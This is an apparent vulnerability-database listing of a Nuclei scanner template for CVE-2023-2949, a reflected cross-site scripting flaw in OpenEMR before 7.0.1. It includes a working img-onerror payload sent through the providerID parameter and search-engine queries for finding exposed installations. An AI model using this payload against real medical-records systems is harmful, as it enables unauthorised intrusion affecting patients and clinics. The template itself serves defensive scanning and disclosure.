Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-2949
HistoryApr 23, 2024 - 1:22 p.m.

OpenEMR < 7.0.1 - Cross-site Scripting

2024-04-2313:22:45
ProjectDiscovery
github.com
7
cve
cve2023
xss
openemr
open-emr
github

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.005

Percentile

76.8%

Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.
id: CVE-2023-2949

info:
  name: OpenEMR < 7.0.1 - Cross-site Scripting
  author: ritikchaddha,princechaddha
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.
  reference:
    - https://huntr.com/bounties/3842486f-38b1-4150-9f78-b81d0ae580c4
    - https://github.com/openemr/openemr/commit/af1ecf78d1342519791bda9d3079e88f7d859015
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2949
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2949
    cwe-id: CWE-79
    cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: open-emr
    product: openemr
    shodan-query:
      - http.favicon.hash:1971268439
      - http.html:"openemr"
      - http.title:"openemr"
    fofa-query:
      - app="OpenEMR"
      - body="openemr"
      - title="openemr"
      - app="openemr"
      - icon_hash=1971268439
    google-query: intitle:"openemr"
  tags: cve,cve2023,xss,openemr,open-emr

http:
  - method: GET
    path:
      - "{{BaseURL}}/interface/forms/eye_mag/js/eye_base.php?providerID=%3Cimg%20src=x%20onerror=alert(document.domain);%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains_all(body, "<img src=x onerror=alert(document.domain);>", "openemr")'
        condition: and
# digest: 4a0a004730450220500a6ac69d9b91d6545f65f7bcafcf9b7188f224274078078fb6020f34c0bc99022100d60da773d8a14a171a971b57098100a9f6589bef9610c2d6b7549c8859f0fa08:922c64590222798bb761d5b6d8e72950

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.005

Percentile

76.8%

Related for NUCLEI:CVE-2023-2949